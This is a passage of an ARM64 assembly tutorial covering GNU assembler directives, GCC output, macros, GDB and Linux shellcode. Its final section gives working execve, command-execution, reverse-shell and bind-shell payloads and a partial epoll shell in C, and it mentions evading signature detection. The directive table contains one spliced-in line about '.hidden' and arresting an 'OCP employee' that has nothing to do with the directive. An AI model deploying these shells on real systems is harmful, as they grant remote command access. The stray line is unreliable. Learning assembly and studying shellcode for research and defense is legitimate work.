The GNU toolchain includes the compiler collection (gcc), debugger (gdb), the C library (glibc), an assembler (gas) and linker (ld). The GNU Assembler (GAS) supports many architectures, so if you’re just starting to write ARM assembly, I cannot currently recommend a better assembler for Linux. Having said that, readers may wish to experiment with other products.

3.1 Preprocessor Directives

The following directives are what I personally found the most useful when writing assembly code with GAS.

Directive Instruction
.arch name Specifies the target architecture. The assembler will issue an error message if an attempt is made to assemble an instruction which will not execute on the target architecture. Examples include: armv8-aarmv8.1-aarmv8.2-aarmv8.3-aarmv8.4-a. Equivalent to the -march option in GCC.
.cpu name Specifies the target processor. The assembler will issue an error message if an attempt is made to assemble an instruction which will not execute on the target processor. Examples include: cortex-a53cortex-a76. Equivalent to the -mcpu option in GCC.
.include “file” Include assembly code from “file”.
.macro namearguments Allows you to define macros that generate assembly output.
.if .if marks the beginning of a section of code which is only considered part of the source program being assembled if the argument (which must be an absolute expression) is non-zero. The end of the conditional section of code must be marked by .endif
.global Tells the assembler the function is publicly accessible.
.equ symbol, expression Equate. Define a symbolic constant. Equivalent to the define directive in C.
.set symbol, expression Set the value of symbol to expression.If symbol was flagged as external, it remains flagged. Similar to the equate directive (.EQU) except the value can be changed later.
name .req register name This creates an alias for register name called name. For example: A .req x0
.size Tells the assembler how much space a function or object is using. If a function is unused, the linker can exclude it.
.struct expression Switch to the absolute section, and set the section offset to expression, which must be an absolute expression.
.skip size, fill This directive emits size bytes, each of value fill. Both size and fill are absolute expressions. If the comma and fill are omitted, fill is assumed to be zero. This is the same as ‘.space’.
.space size, fill TThis directive emits size bytes, each of value fill. Both size and fill are absolute expressions. If the comma and fill are omitted, fill is assumed to be zero. This is the same as ‘.skip’.
.text subsection Tells as to assemble the following statements onto the end of the text subsection numbered subsection, which is an absolute expression. If subsection is omitted, subsection number zero is used.
.data subsection .data tells as to assemble the following statements onto the end of the data subsection numbered subsection (which is an absolute expression). If subsection is omitted, it defaults to zero.
.bss Section for uninitialized data.
.align abs-expr , abs-expr , abs-expr Pad the location counter (in the current subsection) to a particular storage boundary. The first expression (which must be absolute) is the alignment required, as described below. The second expression (also absolute) gives the fill value to be stored in the padding bytes. It (and the comma) may be omitted. If it is omitted, the padding bytes are normally zero. However, on some systems, if the section is marked as containing code and the fill value is omitted, the space is filled with no-op instructions. The third expression is also absolute, and is also optional. If it is present, it is the maximum number of bytes that should be skipped by this alignment directive. If doing the alignment would require skipping more bytes than the specified maximum, then the alignment is not done at all. You can omit the fill value (the second argument) entirely by simply using two commas after the required alignment; this can be useful if you want the alignment to be filled with no-op instructions when appropriate.
.ascii “string” .ascii expects zero or more string literals separated by commas. It assembles each string (with no automatic trailing zero byte) into consecutive addresses.
.hidden Any attempt to arrest a senior OCP employee results in shutdown.
.asciz “string” .asciz is just like .ascii, but each string is followed by a zero byte. The “z” in ‘.asciz’ stands for “zero”.
.string str.string8 str.string16 str The variants string16, string32 and string64 differ from the string pseudo opcode in that each 8-bit character from str is copied and expanded to 16, 32 or 64 bits respectively. The expanded characters are stored in target endianness byte order.
.byte Declares a variable of 8-bits.
.hword/.2byte Declares a variable of 16-bits. The second ensures only 16-bits.
.word/.4byte Declares a variable of 32-bits. The second ensures only 32-bits.
.quad/.8byte Declares a variable of 64-bits. The second ensures only 64-bits.

3.2 GCC Assembly

GCC can be incredibly useful when first starting to learn any assembly language because it provides an option to generate assembly output from source code using the -S option. If you want to generate assembly with source code, compile with -g and -c options, then dump with objdump -d -S. Most people want their applications optimized for speed rather than size, so it stands to reason the GNU C optimizer is not terribly efficient at generating compact code. Our new A.I overlords might be able to change all that, but at least for now, a human wins at writing compact assembly code.

Just to illustrate using an example. Here’s a subroutine that does nothing useful.

#include <stdio.h>

void calc(int a, int b) {
    int i;
    
    for(i=0;i<4;i++) {
      printf("%i\n", ((a * i) + b) % 5);
    }
}

Compile this code using -Os option to optimize for size. The following assembly is gnerated by GCC. Recall that x30 is the link register and saved here because of the call to printf. We also have to use callee saved registers x19-x22 for storing variables because x0-x18 are trashed by the call to printf.

	.arch armv8-a
	.file	"calc.c"
	.text
	.align	2
	.global	calc
	.type	calc, %function
calc:
	stp	x29, x30, [sp, -64]!    // store x29, x30 (LR) on stack
	add	x29, sp, 0              // x29 = sp
	stp	x21, x22, [sp, 32]      // store x21, x22 on stack
	adrp	x21, .LC0               // x21 = "%i\n" 
	stp	x19, x20, [sp, 16]      // store x19, x20 on stack
	mov	w22, w0                 // w22 = a
	mov	w19, w1                 // w19 = b
	add	x21, x21, :lo12:.LC0    // x21 = x21 + 0
	str	x23, [sp, 48]           // store x23 on stack
	mov	w20, 4                  // i = 4
	mov	w23, 5                  // divisor = 5 for modulus
.L2:
	sdiv	w1, w19, w23            // w1 = b / 5
	mov	x0, x21                 // x0 = "%i\n"
	add	w1, w1, w1, lsl 2       // w1 *= 5
	sub	w1, w19, w1             // w1 = b - ((b / 5) * 5)
	add	w19, w19, w22           // b += a
	bl	printf

	subs	w20, w20, #1            // i = i - 1
	bne	.L2                     // while (i != 0)

	ldp	x19, x20, [sp, 16]      // restore x19, x20
	ldp	x21, x22, [sp, 32]      // restore x21, x22
	ldr	x23, [sp, 48]           // restore x23
	ldp	x29, x30, [sp], 64      // restore x29, x30 (LR)
	ret                             // return to caller

	.size	calc, .-calc
	.section	.rodata.str1.1,"aMS",@progbits,1
.LC0:
	.string	"%i\n"
	.ident	"GCC: (Debian 6.3.0-18) 6.3.0 20170516"
	.section	.note.GNU-stack,"",@progbits

i is initialized to 4 instead of 0 and decreased rather than increased. There’s no modulus instruction in the A64 set, and division instructions don’t produce a remainder, so the calculation is performed using a combination of division, multiplication and subtraction. The modulo operation is calculated with the following : R = N - ((N / D) * D)

N denotes the numerator/dividend, D denotes the divisor and R denotes the remainder. The following assembly code is how it might be written by hand. The most notable change is using the msub instruction in place of a separate add and sub.

        .arch armv8-a
	.text
	.align 2
	.global calc

calc:
        stp   x19, x20, [sp, -48]!
        stp   x21, x22, [sp, 16]
        stp   x23, x30, [sp, 32]

	mov   w19, w0           // w19 = a
	mov   w20, w1           // w20 = b
        mov   w21, 4            // i = 4 
	mov   w22, 5            // set divisor
.LC2:
	sdiv  w1, w20, w22      // w1 = b - ((b / 5) * 5) 
	msub  w1, w1, w22, w20  // 
	adr   x0, .LC0          // x0 = "%i\n"
	bl    printf

        add   w20, w20, w19     // b += a	
	subs  w21, w21, 1       // i = i - 1
	bne   .LC2              // 

        ldp   x19, x20, [sp], 16
	ldp   x21, x22, [sp], 16
        ldp   x23, x30, [sp], 16
	ret
.LC0:
	.string "%i\n"

Use compiler generated assembly as a guide, but try to improve upon the code as shown in the above example.

3.3 Symbolic Constants

What if we want to use symbolic constants from C header files in our assembler code? There are two options.

  1. Convert each symbolic constant to its GAS equivalent using the .EQU or .SETdirectives. Very time consuming.
  2. Use C-style #include directive and pre-process using GNU CPP. Quicker with several advantages.

Obviously the second option is less painful and less likely to produce errors. Of course, I’m not discounting the possibility of automating the first option, but why bother? CPP has an option that will do it for us. Let’s see what the manual says.

Instead of the normal output, -dM will generate a list of #define directives for all the macros defined during the execution of the preprocessor, including predefined macros. This gives you a way of finding out what is predefined in your version of the preprocessor.

So, -dM will dump all the #define macros and -E will preprocess a file, but not compile, assemble or link. So, the steps to using symbolic names in our assembler code are:

  1. Use cpp -dM to dump all the #defined keywords from each include header.
  2. Use sort and uniq -u to remove duplicates.
  3. Use the #include directive in our assembly source code.
  4. Use cpp -E to preprocess and pipe the output to a new assembly file. (-o is an output option)
  5. Assemble using as to generate an object file.
  6. Link the object file to generate an executable.

The following is some simple code that displays Hello, World! to the console.

#include "include.h"

        .global _start
        .text

_start:
        mov    x8, __NR_write
        mov    x2, hello_len
        adr    x1, hello_txt
        mov    x0, STDOUT_FILENO
        svc    0

        mov    x8, __NR_exit
        svc    0

        .data

hello_txt: .ascii "Hello, World!\n"
hello_len = . - hello_txt

Preprocess the above source using CPP -E. The result of this will be replacing each symbolic constant used with its assigned numeric value.

Finally, assemble using GAS and link with LD.

The following two directives are examples of simple text substitution or symbolic constants.

  #define FALSE 0
  #define TRUE  1

The equivalent can be accomplished with the .EQU or .SET directives in GAS.

  .equ TRUE, 1
  .set TRUE, 1
  
  .equ FALSE, 0
  .set FALSE, 0

Personally, I think it makes more sense to use the C preprocessor, but it’s entirely up to yourself.

3.4 Structures and Unions

A structure in programming is incredibly useful for combining different data types into a single user-defined data type. One of the major pitfalls in programming any assembly is poorly managed memory access. In my own experience, MASM always had the best support for data structures. NASM and YASM could be much better. Unfortunately support for structures in GAS isn’t great. Understandably, many of the hand-written assembly programs for Linux normally use global variables that are placed in the .datasection of a source file. For a Position Independent Code (PIC) or thread-safe application that can only use local variables allocated on the stack, a data structure helps as a reference to manage those variables. Assigning names helps clarify what each stack address is for, and improves overall quality. It’s also much easier to modify code by simply re-arranging the elements of a structure later.

Take for example the following C structure dimension_t that requires conversion to GAS assembly syntax.

typedef struct _dimension_t {
  int x, y;
} dimension_t;

The closest directive to the struct keyword is .struct. Unfortunately this directive doesn’t accept a name and nor does it allow members to be enclosed between .struct and .ends that some of you might be familiar with in YASM/NASM. This directive only accepts an offsetas a start position.

        .struct 0
dimension_t.x:
        .struct dimension_t.x + 4
dimension_t.y:
        .struct dimension_t.y + 4
dimension_t_size:

An alternate way of defining the above structure can be done with the .skip or .spacedirectives.

        .struct 0
dimension_t.x: .skip 4
dimension_t.y: .skip 4
dimension_t_size:

If we have to manually define the size of each field in the structure, it seems the .structdirective is of little use. Consider using the #define keyword and preprocessing the file before assembling.

#define dimension_t.x 0
#define dimension_t.y 4
#define dimension_t.size 8

For a union, it doesn’t get any better than what I suggest be used for structures. We can use the .set or .equ directives or refer back to a combination of using #define and cpp. Support for both unions and structures in GAS leaves a lot to be desired.

3.5 Operators

From time to time I’ll see some mention of “polymorphic” shellcodes where the author attempts to hide or obfuscate strings using simple arithmetic or bitwise operations. Usually the obfuscation is done via a bit rotation or exclusive-OR and this presumably helps evade detection by some security products.

Operators are arithmetic functions, like + or %. Prefix operators take one argument. Infix operators take two arguments, one on either side. Operators have precedence, but operations with equal precedence are performed left to right.

Precedence Operators
Highest Mutiplication (*), Division (/), Remainder (%), Shift Left (<<), Right Shift (>>).
Intermediate Bitwise inclusive-OR (|), Bitwise And (&), Bitwise Exclusive-OR (^), Bitwise Or Not (!).
Low Addition (+), Subtraction (-), Equal To (==), Not Equal To (!=), Less Than (<), Greater Than (>), Greater Than Or Equal To (>=), Less than Or Equal To (<=).
Lowest Logical And (&&). Logical Or (||).

The following examples show a number of ways to use operators prior to assembly. These examples just load the immediate value 0x12345678 into the w0 register.

   // exclusive-OR
    movz    w0, 0x5678 ^ 0x4823
    movk    w0, 0x1234 ^ 0x5412
    movz    w1, 0x4823
    movk    w1, 0x5412, lsl 16
    eor     w0, w0, w1

    // rotate a value left by 5 bits using MOVZ/MOVK
    movz    w0,  (0x12345678 << 5)        |  (0x12345678 >> (32-5)) & 0xFFFF
    movk    w0, ((0x12345678 << 5) >> 16) | ((0x12345678 >> (32-5)) >> 16) & 0xFFFF, lsl 16
    // then rotate right by 5 to obtain original value
    ror     w0, w0, 5

    // right rotate using LDR
    .equ    ROT, 5

    ldr     w0, =(0x12345678 << ROT) | (0x12345678 >> (32 - ROT)) & 0xFFFFFFFF
    ror     w0, w0, ROT

    // bitwise NOT
    ldr     w0, =~0x12345678
    mvn     w0, w0

    // negation
    ldr     w0, =-0x12345678
    neg     w0, w0
    

3.6 Macros

If we need to repeat a number of assembly instructions, but with different parameters, using macros can be helpful. For example, you might want to eliminate branches in a loop to make code faster. Let’s say you want to load a 32-bit immediate value into a register. ARM instruction encodings are all 32-bits, so it isn’t possible to load anything more than a 16-bit immediate. Some immediate values can be stored in the literal pool and loaded using LDR, but if we use just MOV instructions, here’s how to load the 32-bit number 0x12345678 into register w0.

  movz    w0, 0x5678
  movk    w0, 0x1234, lsl 16

The first instruction MOVZ loads 0x5678 into w0, zero extending to 32-bits. MOVK loads 0x1234 into the upper 16-bits using a shift, while preserving the lower 16-bits. Some assemblers provide a pseudo-instruction called MOVL that expands into the two instructions above. However, the GNU Assembler doesn’t recognize it, so here are two macros for GAS that can load a 32-bit or 64-bit immediate value into a general purpose register.

  // load a 64-bit immediate using MOV
  .macro movq Xn, imm
      movz    \Xn,  \imm & 0xFFFF
      movk    \Xn, (\imm >> 16) & 0xFFFF, lsl 16
      movk    \Xn, (\imm >> 32) & 0xFFFF, lsl 32
      movk    \Xn, (\imm >> 48) & 0xFFFF, lsl 48
  .endm

  // load a 32-bit immediate using MOV
  .macro movl Wn, imm
      movz    \Wn,  \imm & 0xFFFF
      movk    \Wn, (\imm >> 16) & 0xFFFF, lsl 16
  .endm

Then if we need to load a 32-bit immediate value, we do the following.

  movl    w0, 0x12345678

Here are two more that imitate the PUSH and POP instructions. Of course, this only supports a single register, so you might want to write your own.

  // imitate a push operation
  .macro push Rn:req
      str     \Rn, [sp, -16]
  .endm

  // imitate a pop operation
  .macro pop Rn:req
      ldr     \Rn, [sp], 16
  .endm

3.7 Conditional assembly

Like the GNU C compiler, GAS provides support for if-else preprocessor directives. The following shows an example in C.

    #ifdef BIND
      // compile code to bind
    #else
      // compile code to connect
    #endif

Next, an example for GAS.

   .ifdef BIND
      // assemble code to bind
    .else
      // assemble code for connect
    .endif

GAS also supports something similar to the #ifndef directive in C.

    .ifnotdef BIND
      // assemble code for connect
    .else
      // assemble code for bind
    .endif

3.8 Comments

These are ignored by the assembler. Intended to provide an explanation for what code does. C style comments /* */ or C++ style // are a good choice. Ampersand (@) and hash (#) are also valid, however, you should know that when using the preprocessor on an assembly source code, comments that start with the hash symbol can be problematic. I tend to use C++ style for single line comments and C style for comment blocks.

  # This is a comment

  // This is a comment

  /*
    This is a comment
  */

  @ This is a comment.

4. GNU Debugger

Sometimes it’s necessary to closely monitor the execution of code to find the location of a bug. This is normally accomplished via breakpoints and single-stepping through each instruction.

4.1 Layout

There are various front ends for GDB that are intended to enhance debugging. Personally I don’t use GDB enough to be familiar with any of them. The setup I have is simply a split layout that shows disassembly and registers. This has worked well enough for what I need writing these simple codes, but you may want to experiment with the front ends. The following screenshot is what a split layout looks like.

To setup a split layout, save the following to $HOME/.gdbinit

layout split
layout regs

4.2 Commands

The following are a number of commands I’ve found useful for writing code.

Command Description
stepi Step into instruction.
nexti Step over instruction. (skips calls to subroutines)
set follow-fork-mode child Debug child process.
set follow-fork-mode parent Debug parent process.
layout split Display the source, assembly, and command windows.
layout regs Display registers window.
break <address> Set a breakpoint on address.
refresh Refresh the screen layout.
tty [device] Specifies the terminal device to be used for the debugged process.
continue Continue with execution.
run Run program from start.
define Combine commands into single user-defined command.

During execution of code, the window may become unstable. One way around this is to use the ‘refresh’ command, however, that probably only corrects it once. You can use the ‘define’ command to combine multiple commands into one macro.

(gdb) define stepx
Type commands for definition of "stepx".
End with a line saying just "end".
>stepi
>refresh
>end
(gdb) 

This works, but it’s not ideal. The screen will still bump. The best workaround I could find is to create a new terminal window. Obtain the TTY and use this in GDB. e.g. tty /dev/pts/1

5. Common Operations

Initializing or checking the contents of a register are very common operations in any assembly language. Knowing multiple ways to perform these actions can potentially help evade signature detection tools. What I show here isn’t an extensive list of ways by any means because there are umpteen ways to perform any operation, it just depends on how many instructions you wish to use.

5.1 Saving Registers

We can freely use 19 registers without having to preserve them for the caller. Compare this with x86 where only 3 registers are available or 5 for AMD64. One minor annoyance with ARM is calling subroutines. Unlike INTEL CPUs, ARM doesn’t store a return address on the stack. It stores the return address in the Link Register (LR) which is an alias for the x30 register. A callee is expected to save LR/x30 if it calls a subroutine. Not doing so will cause problems. If you migrate from ARM32, you’ll miss the convenience of push and popto save registers. These instructions have been deprecated in favour of load and store instructions, so we need to use STR/STP to save and LDR/LDP to restore. Here’s how you can save/restore registers using the stack.

    // push {x0}
    // [base - 16] = x0
    // base = base - 16
    str    x0, [sp, -16]!

    // pop {x0}
    // x0 = [base]
    // base = base + 16
    ldr    x0, [sp], 16

    // push {x0, x1}
    stp    x0, x1, [sp, -16]!

    // pop {x0, x1}
    ldp    x0, x1, [sp], 16

You might be wondering why 16 is used to store one register. The stack must always be aligned by 16 bytes. Unaligned access can cause exceptions.

5.2 Copying Registers

The first example here is the “normal” way and the rest are a few alternatives.

    // Move x1 to x0
    mov     x0, x1

    // Extract bits 0-63 from x1 and store in x0 zero extended.
    ubfx   x0, x1, 0, 63

    // x0 = (x1 & ~0)
    bic    x0, x1, xzr

    // x0 = x1 >> 0
    lsr    x0, x1, 0

    // Use a circular shift (rotate) to move x1 to x0
    ror    x0, x1, 0
    
    // Extract bits 0-63 from x1 and insert into x0
    bfxil  x0, x1, 0, 63

5.3 Initialize register to zero.

Normally to initialize a counter “i = 0” or pass NULL/0 to a system call. Each one of these instructions will do that.

    // Move an immediate value of zero into the register.
    mov    x0, 0

    // Copy the zero register.
    mov    x0, xzr

    // Exclusive-OR the register with itself.
    eor    x0, x0, x0

    // Subtract the register from itself.
    sub    x0, x0, x0

    // Mask the register with zero register using a bitwise AND.
    // An immediate value of zero will work here too.
    and    x0, x0, xzr

    // Multiply the register by the zero register.
    mul    x0, x0, xzr

    // Extract 64 bits from xzr and place in x0.
    bfxil  x0, xzr, 0, 63
    
    // Circular shift (rotate) right.
    ror    x0, xzr, 0

    // Logical shift right.
    lsr    x0, xzr, 0
    
    // Reverse bytes of zero register.
    rev    x0, xzr

5.4 Initialize register to 1.

Rarely does a counter start at 1, but it’s common enough passing to a system call.

    // Move 1 into x0.
    mov     x0, 1

    // Compare x0 with x0 and set x0 if equal.
    cmp     x0, x0
    cset    x0, eq

    // Bitwise NOT the zero register and store in x0. Negate x0.
    mvn     x0, xzr
    neg     x0, x0

5.5 Initialize register to -1.

Some system calls require this value.

    // move -1 into register
    mov     x0, -1

    // copy the zero register inverted
    mvn     x0, xzr

    // x0 = ~(x0 ^ x0)
    eon     x0, x0, x0

    // x0 = (x0 | ~xzr)
    orn     x0, x0, xzr

    // x0 = (int)0xFF
    mov     w0, 255
    sxtb    x0, w0

    // x0 = (x0 == x0) ? -1 : x0
    cmp     x0, x0
    csetm   x0, eq

5.6 Initialize register to 0x80000000.

This might seem vague now, but an algorithm like X25519 uses this value for its reduction step.

    mov     w0, 0x80000000

    // Set bit 31 of w0.
    mov     w0, 1
    mov     w0, w0, lsl 31

    // Set bit 31 of w0.
    mov     w0, 1
    ror     w0, w0, 1

    // Set bit 31 of w0.
    mov     w0, 1
    rbit    w0, w0

    // Set bit 31 of w0.
    eon     w0, w0, w0
    lsr     w0, w0, 1
    add     w0, w0, 1
    
    // Set bit 31 of w0.
    mov     w0, -1
    extr    w0, w0, wzr, 1

5.7 Testing for 1/TRUE.

A function returning TRUE normally indicates success, so these are some ways to test for that.

    // Compare x0 with 1, branch if equal.
    cmp     x0, 1
    beq     true

    // Compare x0 with zero register, branch if not equal.
    cmp     x0, xzr
    bne     true
    
    // Subtract 1 from x0 and set flags. Branch if equal. (Z flag is set)
    subs    x0, x0, 1
    beq     true

    // Negate x0 and set flags. Branch if x0 is negative.
    negs    x0, x0
    bmi     true

    // Conditional branch if x0 is not zero.
    cbnz    x0, true

    // Test bit 0 and branch if not zero.
    tbnz    x0, 0, true

5.8 Testing for 0/FALSE.

Normally we see a CMP instruction used in handwritten assembly code to evaluate this condition. This subtracts the source register from the destination register, sets the flags, and discards the result.

    // x0 == 0
    cmp     x0, 0
    beq     false

    // x0 == 0
    cmp     x0, xzr
    beq     false

    ands    x0, x0, x0
    beq     false

    // same as ANDS, but discards result
    tst     x0, x0
    beq     false

    // x0 == -0
    negs    x0
    beq     false

    // (x0 - 1) == -1
    subs    x0, x0, 1
    bmi     false

    // if (!x0) goto false
    cbz     x0, false

    // if (!x0) goto false
    tbz     x0, 0, false

5.9 Testing for -1

Some functions will return a negative number like -1 to indicate failure. CMN is used in the first example. This behaves exactly like CMP, except it is adding the source value (register or immediate) to the destination register, setting the flags and discarding the result.

    // w0 == -1
    cmn     w0, 1
    beq     failed

    // w0 == 0
    cmn     w0, wzr
    bmi     failed

    // negative?
    ands    w0, w0, w0
    bmi     failed

    // same as AND, but discards result
    tst     w0, w0
    bmi     failed

    // w0 & 0x80000000
    tbz     w0, 31, failed

6. Linux Shellcode

Developing an operating system, writing boot code, reverse engineering or exploiting vulnerabilities; these are all valid reasons to learn assembly language. In the case of exploiting bugs, one needs to have a grasp of writing shellcodes. These are compact position independent codes that use system calls to interact with the operating system.

6.1 System Calls

System calls are a bridge between the user and kernel space running at a higher privileged level. Each call has its own unique number that is essentially an index into an array of function pointers located in the kernel. Whether you want to write to a file on disk, send and receive data over the network or just print a message to the screen, all of this must be performed via system calls at some point.

A full list of calls can be found in the Linux source tree on github here, but if you’re already logged into a Linux system running on ARM64, you might find a list in /usr/include/asm-generic/unistd.h too. Here are a few to save you time looking up.

  // Linux/AArch64 system calls
  .equ SYS_epoll_create1,   20
  .equ SYS_epoll_ctl,       21
  .equ SYS_epoll_pwait,     22
  .equ SYS_dup3,            24
  .equ SYS_fcntl,           25
  .equ SYS_statfs,          43
  .equ SYS_faccessat,       48
  .equ SYS_chroot,          51
  .equ SYS_fchmodat,        53
  .equ SYS_openat,          56
  .equ SYS_close,           57
  .equ SYS_pipe2,           59
  .equ SYS_read,            63
  .equ SYS_write,           64
  .equ SYS_pselect6,        72
  .equ SYS_ppoll,           73
  .equ SYS_splice,          76
  .equ SYS_exit,            93
  .equ SYS_futex,           98
  .equ SYS_kill,           129
  .equ SYS_reboot,         142
  .equ SYS_setuid,         146
  .equ SYS_setsid,         157
  .equ SYS_uname,          160
  .equ SYS_getpid,         172
  .equ SYS_getppid,        173
  .equ SYS_getuid,         174
  .equ SYS_getgid,         176
  .equ SYS_gettid,         178
  .equ SYS_socket,         198
  .equ SYS_bind,           200
  .equ SYS_listen,         201
  .equ SYS_accept,         202
  .equ SYS_connect,        203
  .equ SYS_sendto,         206
  .equ SYS_recvfrom,       207
  .equ SYS_setsockopt,     208
  .equ SYS_getsockopt,     209
  .equ SYS_shutdown,       210
  .equ SYS_munmap,         215
  .equ SYS_clone,          220
  .equ SYS_execve,         221
  .equ SYS_mmap,           222
  .equ SYS_mprotect,       226
  .equ SYS_wait4,          260
  .equ SYS_getrandom,      278
  .equ SYS_memfd_create,   279
  .equ SYS_access,        1033

All registers except those required to return values are preserved. System calls return results in x0 while everything else remains the same, including the conditional flags. In the shellcode, only immediate values and stack are used for strings. This is the approach I recommend because it allows manipulation of the string before it’s stored on the stack. Using LDR and the literal pool is a good alternative.

6.2 Tracing

“strace” is a diagnostic and debugging utility for Linux can show problems in your code. It will show what system calls are implemented by the kernel and which ones are simply wrapper functions in GLIBC. As I found out while writing some of the shellcodes, there is no dup2pipe, or fork system calls. There are only wrapper functions in GLIBC that call dup3pipe2 and clone.

6.3 Executing a shell.

// 40 bytes

    .arch armv8-a

    .include "include.inc"

    .global _start
    .text

_start:
    // execve("/bin/sh", NULL, NULL);
    mov    x8, SYS_execve
    mov    x2, xzr           // NULL
    mov    x1, xzr           // NULL
    movq   x3, BINSH         // "/bin/sh"
    str    x3, [sp, -16]!    // stores string on stack
    mov    x0, sp
    svc    0

6.4 Executing a command.

Executing a command can be a good replacement for a reverse connecting or bind shell because if a system can execute netcat, ncat, wget, curl, GET then executing a command may be sufficient to compromise a system further. The following just echos “Hello, World!” to the console.

// 64 bytes

    .arch armv8-a
    .align 4

    .include "include.inc"

    .global _start
    .text

_start:
    // execve("/bin/sh", {"/bin/sh", "-c", cmd, NULL}, NULL);
    movq   x0, BINSH             // x0 = "/bin/sh\0"
    str    x0, [sp, -64]!
    mov    x0, sp
    mov    x1, 0x632D            // x1 = "-c"
    str    x1, [sp, 16]
    add    x1, sp, 16
    adr    x2, cmd               // x2 = cmd
    stp    x0, x1,  [sp, 32]     // store "-c", "/bin/sh"
    stp    x2, xzr, [sp, 48]     // store cmd, NULL
    mov    x2, xzr               // penv = NULL
    add    x1, sp, 32            // x1 = argv
    mov    x8, SYS_execve
    svc    0
cmd:
    .asciz "echo Hello, World!"

6.5 Reverse connecting shell over TCP.

The reverse shell makes an outgoing connection to a remote host and upon connection will spawn a shell that accepts input. Rather than use PC-relative instructions, the network address structure is initialized using immediate values.

// 120 bytes

    .arch armv8-a

    .include "include.inc"

    .equ PORT, 1234
    .equ HOST, 0x0100007F // 127.0.0.1

    .global _start
    .text

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x2, IPPROTO_IP
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     w3, w0       // w3 = s

    // connect(s, &sa, sizeof(sa));
    mov     x8, SYS_connect
    mov     x2, 16
    movq    x1, ((HOST << 32) | ((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp     // x1 = &sa 
    svc     0

    // in this order
    //
    // dup3(s, STDERR_FILENO, 0);
    // dup3(s, STDOUT_FILENO, 0);
    // dup3(s, STDIN_FILENO,  0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
c_dup:
    mov     x2, xzr
    mov     w0, w3
    subs    x1, x1, 1
    svc     0
    bne     c_dup

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp]
    mov     x0, sp
    svc     0

6.6 Bind shell over TCP.

Pretty much the same as the reverse shell except we listen for incoming connections using three separate system calls. bindlistenaccept are used in place of connect. This could easily be updated to include connect using the conditional assembly discussed before.

// 148 bytes

    .arch armv8-a

    .include "include.inc"

    .equ PORT, 1234

    .global _start
    .text

_start:
    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    mov     x8, SYS_socket
    mov     x2, IPPROTO_IP
    mov     x1, SOCK_STREAM
    mov     x0, AF_INET
    svc     0

    mov     w3, w0       // w3 = s

    // bind(s, &sa, sizeof(sa));  
    mov     x8, SYS_bind
    mov     x2, 16
    movl    w1, (((((PORT & 0xFF) << 8) | (PORT >> 8)) << 16) | AF_INET)
    str     x1, [sp, -16]!
    mov     x1, sp
    svc     0

    // listen(s, 1);
    mov     x8, SYS_listen
    mov     x1, 1
    mov     w0, w3
    svc     0

    // r = accept(s, 0, 0);
    mov     x8, SYS_accept
    mov     x2, xzr
    mov     x1, xzr
    mov     w0, w3
    svc     0

    mov     w3, w0

    // in this order
    //
    // dup3(s, STDERR_FILENO, 0);
    // dup3(s, STDOUT_FILENO, 0);
    // dup3(s, STDIN_FILENO,  0);
    mov     x8, SYS_dup3
    mov     x1, STDERR_FILENO + 1
c_dup:
    mov     w0, w3
    subs    x1, x1, 1
    svc     0
    bne     c_dup

    // execve("/bin/sh", NULL, NULL);
    mov     x8, SYS_execve
    movq    x0, BINSH
    str     x0, [sp]
    mov     x0, sp
    svc     0

6.7 Synchronized shell

“And now for something completely different.”

There’s nothing wrong with the bind or reverse shells mentioned. They work fine. However, it’s not possible to manipulate the incoming or outgoing streams of data, so there isn’t any confidentiality provided between two systems. To solve this we use sychronization. Most POSIX systems offer the select function for this purpose. It allows one to monitor I/O of file descriptors. However, select is limited in how many descriptors it can monitor in a single process. For that reason, kqueue on BSD and epoll on Linux were developed as they are unaffected the same limitations.

#define _GNU_SOURCE

#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <signal.h>
#include <sys/epoll.h>
#include <fcntl.h>
#include <sched.h>

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

int main(void) {
    struct sockaddr_in sa;
    int                i, r, w, s, len, efd; 
    #ifdef BIND
    int                s2;
    #endif
    int                fd, in[2], out[2];
    char               buf[BUFSIZ];
    struct epoll_event evts;
    char               *args[]={"/bin/sh", NULL};
    pid_t              ctid, pid;
 
    // create pipes for redirection of stdin/stdout/stderr
    pipe2(in, 0);
    pipe2(out, 0);

    // fork process
    ctid = syscall(SYS_gettid);
    
    pid  = syscall(SYS_clone, 
        CLONE_CHILD_SETTID   | 
        CLONE_CHILD_CLEARTID | 
        SIGCHLD, 0, NULL, 0, &ctid);

    // if child process
    if (pid == 0) {
      // assign read end to stdin
      dup3(in[0],  STDIN_FILENO,  0);
      // assign write end to stdout   
      dup3(out[1], STDOUT_FILENO, 0);
      // assign write end to stderr  
      dup3(out[1], STDERR_FILENO, 0);  
      
      // close pipes
      close(in[0]);  close(in[1]);
      close(out[0]); close(out[1]);
      
      // execute shell
      execve(args[0], args, 0);
    } else {      
      // close read and write ends
      close(in[0]); close(out[1]);
      
      // create a socket
      s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
      
      sa.sin_family = AF_INET;
      sa.sin_port   = htons(atoi("1234"));
      
      #ifdef BIND
        // bind to port for incoming connections
        sa.sin_addr.s_addr = INADDR_ANY;
        
        bind(s, (struct sockaddr*)&sa, sizeof(sa));
        listen(s, 0);
        r = accept(s, 0, 0);
        s2 = s; s = r;
      #else
        // connect to remote host
        sa.sin_addr.s_addr = inet_addr("127.0.0.1");
      
        r = connect(s, (struct sockaddr*)&sa, sizeof(sa));
      #endif
      
      // if ok
      if (r >= 0) {
        // open an epoll file descriptor
        efd = epoll_create1(0);
 
        // add 2 descriptors to monitor stdout and socket
        for (i=0; i<2; i++) {
          fd = (i==0) ? s : out[0];
          evts.data.fd = fd;
          evts.events  = EPOLLIN;
        
          epoll_ctl(efd, EPOLL_CTL_ADD, fd, &evts);
        }
          
        // now loop until user exits or some other error
        for (;;) {
          r = epoll_pwait(efd, &evts, 1, -1, NULL);
                  
          // error? bail out           
          if (r < 0) break;
         
          // not input? bail out
          if (!(evts.events & EPOLLIN)) break;

          fd = evts.data.fd;
          
